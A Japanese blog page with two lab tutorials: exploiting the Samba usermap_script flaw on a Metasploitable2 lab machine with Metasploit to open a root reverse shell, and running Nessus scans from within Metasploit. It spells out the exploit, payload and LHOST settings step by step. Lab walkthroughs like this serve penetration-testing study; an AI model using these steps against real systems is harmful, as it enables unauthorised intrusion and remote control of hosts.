fc2ブログ

metasploitable2 samba攻略

metasploitable2 samba攻略

virtualbox を起動し
BT5R3
metasploitable2
を起動

以下、BT5R3 の操作

まず root でログインして
startx で X windows 起動

service nessusd start
でNessus起動

msfconsole

MSF起動

load nessus
で MSFから Nessus 接続機能ロード

nessus_connect hjuser:Nessusのパスワード@127.0.0.1
でNessus 接続

search samba
で samba の脆弱性を調べる

この中から
use exploit/multi/samba/usermap_script
で使用する Exploit を指定

次に指定可能なオプションを
show options
で確認

オプションの確認ができたら
RHOST、つまり対象の設定
set RHOST 192.168.10.214

次に show payloads
を実行して、実行可能な payload の確認

この中から指定する payload の指定をする
set payload cmd/unix/reverse

一覧のときには
payloads なのに、
セットするときには payload なので注意

reverse では
相手側から自ホスト側に接続が行われるので
自ホスト側の設定が必要になるので

show options
でオプションを確認すると
LHOST
LPORT
の設定がでているのが確認できるので
設定する

オプションで確認したときに
Required のところに yes となっているけど
これは必須項目という意味

とりあえず、自マシンのIPが必要なので
ifconfig で調べて
set LHOST 192.168.10.174
というように
set LHOST BT5R3のIPアドレス
と設定する

これをやらないと exploit が実行できない

これで、再び
show options
で設定を確認して LHOST にIPアドレスが
設定されたか確認する

ここまでできたら、
exploit
で実行

Command shell session 1 opened
となるまで待つ
あとは、 vsftpd のときと同じように
id;
でroot 権限になっているか
ifconfig:
でIPの確認
などで権限やリモートシェルの確認ができればOK

終了したいときには
Ctrl + c で
Abort session 1? [y/N] y
で終了できる

今回の参考書籍

スポンサーサイト



テーマ : セキュリティ
ジャンル : コンピュータ

metasploit framework から Nessus を使う

metasploit framework から Nessus を使う

Metasploit Framework には
Nessus にアクセスするためのブリッジ機能があり
この機能を使うことで
Metasploit Framework 通称 MSF から
スキャン実行、検査結果の参照などが可能になる

まずは nessusd を起動しておく

service nessusd start

次に
msfconsole
を実行して MSF起動
ターミナルが
root@bt
から
msf >
にかわれるので、わかりやすい

ここまでできたら、
load nessus

これで
Nessus に接続するための機能がロードされる

nessus_help
で、使用可能なコマンドの確認ができる

nessus_connect hjuser:password@127.0.0.1
というように
nessus connect Nessusユーザ名:パスワード@NessusホストIPアドレス

で接続

これで、接続できたら、スキャンを実行していく

まず
nessus_policy_list
でポリシーリストを表示

ここで表示されるポリシーIDは
スキャン実行時のパラメータに使う

-1 Internal Network Scan
-2 Prepare for PCI-DSS audits (section 11.2.2)
-3 Web App Tests
-4 External Network Scan
1 metasploit
が私の場合の環境

スキャンの実行は
nessus_scan_new 1 metasploit-test 192.168.10.21
というように
nessus_scan_new ポリシーID 任意のスキャンの名称 対象IPアドレス

となる
スキャンの名称は、あとで実行結果をみるときに使う
ファイル名のようなもの

ターゲットIPアドレスの指定は
複数指定も可能で , で区切って書くけど
スペースをいれるとエラーになるので注意
○ 192.168.10.214,192.168.10.244

X 192.168.10.214 , 192.168.10.244

というかんじ

スキャン中のステータスに関しては
nessus_scan_status
で確認することができる

MSFから実行したスキャン結果についても
Nessus へログインして見ることができる


今回も参考書籍は



metasploit とペネトレーションテストに関しても
書籍がでているので、こちらも参考にするとよいかも


テーマ : セキュリティ
ジャンル : コンピュータ

最新記事
検索フォーム
GREEハコニワ攻略サイト
リンク
カテゴリ
月別アーカイブ
フリーエリア
最新記事
FXプライムレート
最新コメント
最新トラックバック